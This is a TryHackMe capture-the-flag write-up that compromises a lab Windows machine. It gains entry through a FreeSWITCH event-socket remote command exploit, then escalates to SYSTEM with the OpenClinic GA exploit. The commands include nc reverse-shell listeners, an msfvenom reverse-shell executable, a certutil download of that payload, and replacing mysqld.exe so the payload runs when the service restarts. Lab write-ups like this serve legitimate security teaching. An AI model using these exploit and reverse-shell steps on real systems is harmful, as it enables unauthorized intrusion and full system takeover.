TryHackMe Writeups

All my public writeups for 👨🏻‍💻🚩

View on GitHub


Hein Andre Grønnestad



A quick nmap search show a couple of services running on the target machine:

$ nmap -vv -Pn -sV
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times may be slower.
Starting Nmap 7.92 ( ) at 2022-03-08 14:01 CET
NSE: Loaded 45 scripts for scanning.
Initiating Parallel DNS resolution of 1 host. at 14:01
Completed Parallel DNS resolution of 1 host. at 14:01, 1.03s elapsed
Initiating Connect Scan at 14:01
Scanning [1000 ports]
Discovered open port 3389/tcp on
Discovered open port 8021/tcp on
Completed Connect Scan at 14:01, 5.87s elapsed (1000 total ports)
Initiating Service scan at 14:01
Scanning 2 services on
Completed Service scan at 14:01, 8.02s elapsed (2 services on 1 host)
NSE: Script scanning
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 14:01
Completed NSE at 14:01, 0.00s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 14:01
Completed NSE at 14:01, 0.00s elapsed
Nmap scan report for
Host is up, received user-set (0.049s latency).
Scanned at 2022-03-08 14:01:45 CET for 14s
Not shown: 998 filtered tcp ports (no-response)
3389/tcp open  ms-wbt-server    syn-ack Microsoft Terminal Services
8021/tcp open  freeswitch-event syn-ack FreeSWITCH mod_event_socket
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 15.16 seconds

FreeSWITCH mod_event_socket

I’ve never heard about FreeSWITCH mod_event_socket before, but a quick search using searchsploit reveals a promising RCE vulnerability.

$ searchsploit FreeSWITCH
------------------------------------- ---------------------------------
 Exploit Title                       |  Path
------------------------------------- ---------------------------------
FreeSWITCH - Event Socket Command Ex | multiple/remote/47698.rb
FreeSWITCH 1.10.1 - Command Executio | windows/remote/47799.txt
------------------------------------- ---------------------------------
Shellcodes: No Results
Papers: No Results

$ searchsploit -m 47799
  Exploit: FreeSWITCH 1.10.1 - Command Execution
     Path: /usr/share/exploitdb/exploits/windows/remote/47799.txt
File Type: Python script, ASCII text executable

Copied to: /home/hag/thm/flatline/47799.txt

Remote Code Execution

The 47799.txt file is actually a Python script. Using the script, we can run commands on the remote machine and we get the command output back as well.

$ mv 47799.txt

$ python3 whoami
Content-Type: api/response
Content-Length: 25


🚩 Flag 1: user.txt

As we can see when running whoami, we are currently running commands as the win-eom4pk0578n\nekrotic user. We should be able to retrieve the user.txt flag at this point.

$ python3 "dir c:\users\Nekrotic\Desktop"
Content-Type: api/response
Content-Length: 374

 Volume in drive C has no label.
 Volume Serial Number is 84FD-2CC9

 Directory of c:\users\Nekrotic\Desktop

09/11/2021  07:39    <DIR>          .
09/11/2021  07:39    <DIR>          ..
09/11/2021  07:39                38 root.txt
09/11/2021  07:39                38 user.txt
               2 File(s)             76 bytes
               2 Dir(s)  50,602,835,968 bytes free

$ python3 "type c:\users\Nekrotic\Desktop\user.txt"
Content-Type: api/response
Content-Length: 38


The root.txt flag is not accessible to this user, so we must elevate our privileges.

Reverse Shell

Let’s try and get a reverse shell as the win-eom4pk0578n\nekrotic user first, that will make privilege escalation easier.

Reverse shell created using; template Powershell #3 (Base64).

Set up the listener

$ nc -lvnp 4242
listening on [any] 4242 ...

Run the RCE exploit with the reverse shell payload


We get a connection back to our attacker machine:

connect to [] from (UNKNOWN) [] 49797
PS C:\Program Files\FreeSWITCH>

Privilege Escalation

Looking around at the target, we found PS C:\projects\openclinic> which looks interesting.

$ searchsploit openclinic
-------------------------------------------- ---------------------------------
 Exploit Title                              |  Path
-------------------------------------------- ---------------------------------
OpenClinic GA 5.194.18 - Local Privilege Es | windows/local/50448.txt
-------------------------------------------- ---------------------------------
Shellcodes: No Results
Papers: No Results

Looks like we have a LPE vulnerability.

Create payload

PoC taken from windows/local/50448.txt:

$ msfvenom -p windows/shell_reverse_tcp LHOST= LPORT=9999 -f exe
 > rs.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 324 bytes
Final size of exe file: 73802 bytes

Download payload to target

certutil.exe -urlcache -f rs.exe

Replacing mysqld.exe and restarting services

Stop the OpenClinicMySQL service so we can replace mysqld.exe with the reverse shell:

PS C:\projects\openclinic\mariadb\bin> net stop OpenClinicMySQL
The OpenClinicMySQL service is stopping.
The OpenClinicMySQL service was stopped successfully.

PS C:\projects\openclinic\mariadb\bin> rm mysqld.exe

PS C:\projects\openclinic\mariadb\bin> cp C:\projects\openclinic\rs.exe mysqld.exe

Start the new listener:

$ nc -lvnp 9999
listening on [any] 9999 ...

Restart the OpenClinicMySQL service to run our reverse shell on the target:

PS C:\projects\openclinic\mariadb\bin> net start OpenClinicMySQL

Successful Privilege Escalation

We got a connection from the target. We are now nt authority\system and can read root.txt:

connect to [] from (UNKNOWN) [] 49861
Microsoft Windows [Version 10.0.17763.737]
(c) 2018 Microsoft Corporation. All rights reserved.

nt authority\system


 Volume in drive C has no label.
 Volume Serial Number is 84FD-2CC9

 Directory of c:\Users\Nekrotic\Desktop

09/11/2021  07:39    <DIR>          .
09/11/2021  07:39    <DIR>          ..
09/11/2021  07:39                38 root.txt
09/11/2021  07:39                38 user.txt
               2 File(s)             76 bytes
               2 Dir(s)  50,430,775,296 bytes free

🚩 Flag 2: root.txt

c:\Users\Nekrotic\Desktop>type root.txt

type root.txt